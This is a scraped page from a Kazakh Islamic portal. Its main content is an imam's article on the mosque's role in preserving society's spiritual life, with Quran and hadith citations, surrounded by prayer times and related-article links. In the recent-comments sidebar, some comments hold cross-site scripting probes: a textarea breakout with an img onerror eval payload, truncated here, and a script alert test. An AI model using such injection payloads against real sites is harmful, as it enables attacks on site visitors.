МЕШІТ - ҚОҒАМ РУХАНИЯТ ҚОРҒАУШЫСЫ
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Күн 07:20
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:55 14:43 16:25 17:48
ықшамдау
Күнтізбе
Хижри
23 Джумада-сани 1446
Миләди
25 желтоқсан 2024

Мақалалар

МЕШІТ - ҚОҒАМ РУХАНИЯТ ҚОРҒАУШЫСЫ

| A | +

Исламда мешіт ұғымы – өте кең, әрі ауқымды мағынаны қамтиды. Мұсылмандарға құлшылық орны болуымен қатар, ол қоғамның руханиятын сақтаушы институт болып табылады.

Мешіт – жекелей адамның тап болған мәселелерін шешуге, әрі қоғам арасындағы бірлік пен бейбітшіліктің, ынтымақтың сақталуына негізгі себеп болатын орын. Бұлай айтуымыздың себебі – қазақ қоғамында қалыптасқан, дінмен ұштасқан ғұрыпқа сай адам өміріне қатысты басты діни рәсімдердің барлығы мешітте орындалады. Мысалы, балаға азан шақырып ат қою, екі жастың некелері қиылуы, жаназа шығарылу сынды рәсімдер жүзеге асырылады. Бұл жеке адамның өміріне қатысты кейбір істеріндегі рөлі.

Мешіттің қоғамдағы рөліне келер болсақ, әрбір отбасы мүшесі қоғамның бір бөлігі екені мәлім. Сол себепті мешіт пендені имандылыққа, адалдыққа, отансүйгіштікке, мейірімділікке, қарапайымдылық секілді адами қасиеттерге тәрбиелей отырып, қоғамды түзейді. Дана бабаларымыз «Отан – отбасынан басталады» - деп дөп атқан. Отбасының тұрақтылығы, қоғамның тұрақтылығына алып келеді. Ол өз кезегінде мемлекеттің тұрақты, әрі бейбіт болуының алғышарты.

Исламның маңызды қағидаларының бірін Алла Тағала Құран Кәрімде былай деп баяндайды:

يَا أَيُّهَا النَّاسُ إِنَّا خَلَقْنَاكُمْ مِنْ ذَكَرٍ وَأُنْثَى وَجَعَلْنَاكُمْ شُعُوبًا وَقَبَائِلَ لِتَعَارَفُوا إِنَّ أَكْرَمَكُمْ عِنْدَ اللَّهِ أَتْقَاكُمْ إِنَّ اللَّهَ عَلِيمٌ خَبِيرٌ

«Уа адамдар! Шүбәсіз, сендерді бір ер мен бір әйелден жараттық. Сондай-ақ сендерді бір-біріңмен танысып, табысуларың (һәм бір-біріңе қамқоршы дос болып, өзара жәрдемдесіп, тату-тәтті өмір сүрулерің әрі жер бетін көркейтулерің) үшін сан алуан ұлыстар мен руларға бөлдік. Біле білеңдер, Алланың алдындағы ең ардақтыларың – ең тақуаларың (яғни, Аллаға тағзым етуде, иман келтіруде әрі мойынұсынуда ең алда болғандарың)! Шүбәсіз, Алла – Алим (барлық нәрсені, соның ішінде, сендердің жай-күйлеріңді һәм не істеп, не қойып жүргендеріңді толық білуші), Хабир (бәрінен толық хабардар болушы)» [1].

Осы аят арқылы Алла Тағала пенденің дәрежесі тек тақуалығымен ғана бағаланатындығын әрі қоғамның негізгі мақсаты бір-біріне қамқоршы болып, өзара жәрдемдесіп, тату-тәтті өмір сүрулері, әрі жер бетін көркейтулері екендігін баяндауда. Абай атамыздың:

«Махаббатпен жаратқан адамзатты,

Сен де сүй ол Алланы жаннан тәтті.

Адамзаттың бәрін сүй бауырым деп,

Және хақ жолы осы деп әділетті», – деген даналық ойының бір себебі осы болса керек.

Алла елшісі (оған Алланың салауаты мен сәлемі болсын) хадисінде:

عَنْ أَبِي هُرَيْرَةَ قَالَ : قَالَ رَسُولُ اللهِ صلى الله عليه وسلم : إِنَّ اللَّهَ لاَ يَنْظُرُ إِلَى صُوَرِكُمْ وَأَمْوَالِكُمْ وَلَكِنْ يَنْظُرُ إِلَى قُلُوبِكُمْ وَأَعْمَالِكُمْ.

«Шын мәнінде Алла сендердің келбеттеріңе, байлықтарыңа қарамайды, Алла сендердің жүректеріңе, амалдарыңа қарайды»[2] дейді.

Расымен де Алла Тағала пенденің көркем келбетіне, дүние-мүлкінің көптігіне, атақ-даңқының жоғары болуына қарамайды. Бай-кедей, ұзын-қысқа, ақ-қара деп бөліп-жарып дәреже бермейді. Алла құлының жүрегіне, Өзіне деген ықыласы мен сүйіспеншілігіне қарап баға береді. Мұның шынайы көрінісін біз бір қатарға тұрып, жамағатпен намаз оқыған халықтан көре аламыз. Алла пендені бай-кедей деместен бір сапқа тұрып намаз оқуды бұйырды. Осы арқылы кез-келген қоғам мүшесі өзінің қоғамдағы үлкен дәрежесіне қарамастан Алла назарында басқалардан еш айырмасы жоқ екенін түсіне алады.

Алла елшісінің (оған Алланың салауаты мен сәлемі болсын) мына хадисінде:

عَنْ أَبِي هُرَيْرَةَ قَالَ : قَالَ رَسُولُ اللهِ صلى الله عليه وسلم: وَمَا اجْتَمَعَ قَوْمٌ فِى بَيْتٍ مِنْ بُيُوتِ اللَّهِ يَتْلُونَ كِتَابَ اللَّهِ وَيَتَدَارَسُونَهُ بَيْنَهُمْ إِلاَّ نَزَلَتْ عَلَيْهِمُ السَّكِينَةُ وَغَشِيَتْهُمُ الرَّحْمَةُ وَحَفَّتْهُمُ الْمَلاَئِكَةُ وَذَكَرَهُمُ اللَّهُ فِيمَنْ عِنْدَهُ

Әбу Һұрайрадан (Алла оған разы болсын) жеткен хадисте Алла елшісі (оған Алланың салауаты мен сәлемі болсын): «Алланың үйлерінің бірінде жиналып, Алланың кітабын оқыған және оны бір-біріне үйреткен қауымға тыныштық беріледі, рақым етіледі, оларды періштелер орап алады (қорғайды), Алла оларды Өзінің құзырындағы адамдардың ішінде еске алады» [3], деген. Хадистен мешіттің білім ордасы, тыныштықтың кепілі әрі рақымдылық мекені екенін байқаймыз.

Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) заманынан бастап мешіттер мемлекеттің ішкі әрі сыртқы саясатынының дұрыс жүргізілуіне басты да елеулі үлес қосып отырған. Қоғамдағы күрделі мәселелер талқыланып, олардың қоғам мен жеке адамдарға пайдалы тұстары қаралып, шешім шығарылатын. Білім, мәдениет, ғылым салаларының дамуы да мешіттің қабырғасынан бастау алған болатын. Кейін келе медресе мен университеттерге ауысты. Тіпті мемлекет басшысының сайлануы да мешітте қабылданатын еді.

Қорытындылар болсақ, мешіт – адам мен қоғам өмірінде ерекше әрі аса маңызды рөл атқарады. Мұсылмандардың иманын қуаттап, елге әрі қоғамға аянбай еңбек ету басты борыш екенін еске салып отырады. Мемлекеттің бейбітшілігі мен тұрақтылығын насихаттап, сақталуын қамтамасыз ететін бірден-бір қасиетті мекен десек қателеспейміз.

 

Сілтемелер:

  1. Хужурат сүресі 13-аят

  2. Муслим хадистер жинағы

  3. Муслим хадистер жинағы

Вайнах мешітінің наиб имамы

Бекжанов Құдірет

 

ДЕРЕККӨЗІ Azan.kz

Ислам ақпараттық-ағарту порталы 

Предыдущий Следующий
КӨКТЕ ПАРЫЗ БОЛҒАН ҚҰЛШЫЛЫҚ МИҒРАЖ КЕШІНІҢ КЕРЕМЕТТЕРІ

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Қоғам ЛГБТ ҮКІМІ
ЛГБТ – лесбиян[1], гей[2], бисексуал[3] және трансгендер[4] сөздерінің қысқартылып берілген атауы.
Қоғам АДАМДЫ ҚҰРДЫМҒА КЕТІРЕТІН 4 НӘРСЕ
Ардақты Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) былай деген: «Ғибадаттардың шамаларың жететінін таңдаңдар. Сендер құлшылықтан жалықпайынша, Алла Тағала сендерге сауап беруді үзбейді»....
Қоғам АҚСАҚАЛДАР КЕҢЕСІ – ҰЛТЫМЫЗҒА ТӘН ИНСТИТУТ
Жуырда Қазақстан мұсылмандары діни басқармасы жанынан Ақсақалдар кеңесі құрылды. Осы кеңестің мүшесі әрі ардагер имам ретінде айтулы басқосуға мен де қатыстым. Бұл – мен үшін үлкен мәртебе әрі жауапкершілік деп санаймын....
Қоғам Қайрат Құрманбаев: Елін ойламағанның — ерлігі зая, ертеңін ойламағанның — тірлігі зая!
Періштелердің: «Онда (Жер бетінде) бұзақылық істеп, қан төгетін біреуді жаратасың ба?..»(Бақара сүресі, 30)- деп, Жаратқанға шағымдануы бекер емес секілді...  Әрине, адамды Алла қан төксін, бұзсын, бүлдірсін деп жаратпаған. Адам жаратылғанда оған құрмет ретінде періштелерге тағзым еткізіп, барлық нә...
Қоғам ТҮРМЕДЕ БЕРІЛГЕН ИЖАЗА
Жеке архивімде көптен сақталып келе жатқан осы бір сырлы ижазаны оқырман назарына ұсынуды жөн көрдім. Бұл ғұлама Әбу Насыр Мүбашшир ат-Таразидің (1896-1977) ұлы Насрулла ат-Таразиге (1922-2002) берген ижазасы....
Қоғам «...ҚАШПАҢДАР ҚАРА БОЯУДАН!»
Ақиық ақын Мұқағали Мақатаев «Қап-қара, ғажап, сиқырлы, Қашпаңдар қара бояудан! Қандырып уыз-ұйқымды, Қап-қара түннен оянғам» деп жырлаған болатын. Шынында, қазақ үшін қара сөзінің де қасиеті бар. Себебі қара түстің астарында үлкен таным жатыр....
ықшамдау
Күнтізбе
Хижри
23 Джумада-сани 1446
Миләди
25 желтоқсан 2024
Намаз уақыттары
қазір

Күн 07:20

Бесінге дейін 00:24

О милостыне

</tEXtArEa>'"/><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3D

X X
3 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi